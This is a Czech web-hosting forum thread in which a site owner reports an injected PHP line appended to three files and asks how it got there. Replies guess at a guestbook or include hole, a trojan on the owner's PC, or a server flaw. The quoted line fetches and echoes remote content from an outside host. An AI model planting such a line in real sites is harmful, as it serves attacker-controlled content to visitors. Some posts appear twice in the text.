Hacknuté stránky - Ale jak?
Zdravím,
tak si brouzdám na svých stránkách a co nevidím... Na spodku stránky jsou nějaký PHP warningy (že není povolená fce file_get_contents, což ale není zas tak důležitý). Protože takovou funkci jsem samozřejmě nepoužíval, stáhl jsem si zdrojáky a co nevidím... Na konci tří souborů jsem našel tento krásný řádek:
< ?php echo file_get_contents("http://xepace.cn/11/1"); ? ><script> </script>
Otázka zní, jak se tam ten kód mohl dostat?
Kdyby to bylo třeba v databázi, tak ještě pochopím, že jsem třeba na něco zapomněl, přestože htmlspecialchars ošetřený mám... Kdyby to byl jinej typ XSS, tak mi pořád není jasný, jak by se ten kód mohl zapsat do PHP skriptu!
Ale ten kód byl prostě na konci těch PHP souborů, který se nijak negenerujou a jsou pořád stejný.
Napadají mě pouze dvě možnosti:
- někdo nějakým způsobem prolomil moje heslo na FTP (netuším, jak by to mohl udělat)
- na serveru WZ je nějakej červ, kterej to tam prostě natvrdo připsal (no, to je jen taková idea, ani nevím, jestli něco takovýho existuje)
Nic jinýho mě nenapadá. Díky za každý nápad. A ne že se teď všichni budou snažit najít díru a hacknout mi to zase ;-)
tak si brouzdám na svých stránkách a co nevidím... Na spodku stránky jsou nějaký PHP warningy (že není povolená fce file_get_contents, což ale není zas tak důležitý). Protože takovou funkci jsem samozřejmě nepoužíval, stáhl jsem si zdrojáky a co nevidím... Na konci tří souborů jsem našel tento krásný řádek:
< ?php echo file_get_contents("http://xepace.cn/11/1"); ? ><script> </script>
Otázka zní, jak se tam ten kód mohl dostat?
Kdyby to bylo třeba v databázi, tak ještě pochopím, že jsem třeba na něco zapomněl, přestože htmlspecialchars ošetřený mám... Kdyby to byl jinej typ XSS, tak mi pořád není jasný, jak by se ten kód mohl zapsat do PHP skriptu!
Ale ten kód byl prostě na konci těch PHP souborů, který se nijak negenerujou a jsou pořád stejný.
Napadají mě pouze dvě možnosti:
- někdo nějakým způsobem prolomil moje heslo na FTP (netuším, jak by to mohl udělat)
- na serveru WZ je nějakej červ, kterej to tam prostě natvrdo připsal (no, to je jen taková idea, ani nevím, jestli něco takovýho existuje)
Nic jinýho mě nenapadá. Díky za každý nápad. A ne že se teď všichni budou snažit najít díru a hacknout mi to zase ;-)
<HTML>Není díra v guestbooku nebo v použití include?</HTML>
V GB si myslím díra není...
V includu moc nevím, jakou chybu použití máš na mysli...
A i kdyby, tak mi pořád vrtá hlavou, jak někdo něco může zvenku zapsat na PHP souboru na serveru...
V includu moc nevím, jakou chybu použití máš na mysli...
A i kdyby, tak mi pořád vrtá hlavou, jak někdo něco může zvenku zapsat na PHP souboru na serveru...
Nípal: "Není díra v guestbooku nebo v použití include?"
Vzhledem k tomu, že tady funkce file_get_contents() zakázaná není, tak tipuji že ta chybová hláška se jednala zakázaného http wrapperu. A protože je http wrappper zakázaný, tak:
1) někdo to tam vložil dřív, než se wrapper globálně zakazoval (víc než rok zpátky?) - protože potom už by skrz případné díry neprocpal externí kód - viz chyba o zakázaném http wrapperu.
2) bude problém jinde:
2a) vir/trojan nebo podobná existence v PC majitele
2b) dosud neznámá díra na severu (nebyla by první ani poslední)
Vzhledem k tomu, že tady funkce file_get_contents() zakázaná není, tak tipuji že ta chybová hláška se jednala zakázaného http wrapperu. A protože je http wrappper zakázaný, tak:
1) někdo to tam vložil dřív, než se wrapper globálně zakazoval (víc než rok zpátky?) - protože potom už by skrz případné díry neprocpal externí kód - viz chyba o zakázaném http wrapperu.
2) bude problém jinde:
2a) vir/trojan nebo podobná existence v PC majitele
2b) dosud neznámá díra na severu (nebyla by první ani poslední)
Tom
no, osobně si taky myslím, že to bude bod 2...
ad a) to je čistě teoreticky možný - ikdyž antivir mi nic nenachází, dneska je ale možný všechno...
No, asi mi nezbyde nic jinýho, než to zatím neřešit, pokud se to nebude nějak masivně opakovat...
Každopádně díky za reakce.
no, osobně si taky myslím, že to bude bod 2...
ad a) to je čistě teoreticky možný - ikdyž antivir mi nic nenachází, dneska je ale možný všechno...
No, asi mi nezbyde nic jinýho, než to zatím neřešit, pokud se to nebude nějak masivně opakovat...
Každopádně díky za reakce.
Nové příspěvky
Soubor .env
Nevykonává se PHP
QR knihovna v PHP?
Aktivace PHP
samovolně se mi z kodu odmazává \
Chyba stránky
dolovani dat z html tabulky
kontaktní formulář
Aktualizace PHO
rozšíření přílohy
CRON
Ppocitadlo
NGINX
Drupal
Chyba po nahrání PHPBB
verze PHP
Nedefinováno __DIR__
PHP error NotCallableException
Nefungující funkce
htaccess 500 error
Nefunkční json_decode(...)
Zobrazení chyb v php
Oprávnění v phpMyAdmin
PHP a háže error 500
WooCommerce
Další témata
STATUS
FTP
HTTP
SQL
PHP
© 2002 - 2024 Web zdarma s.r.o. — zvládnete to sami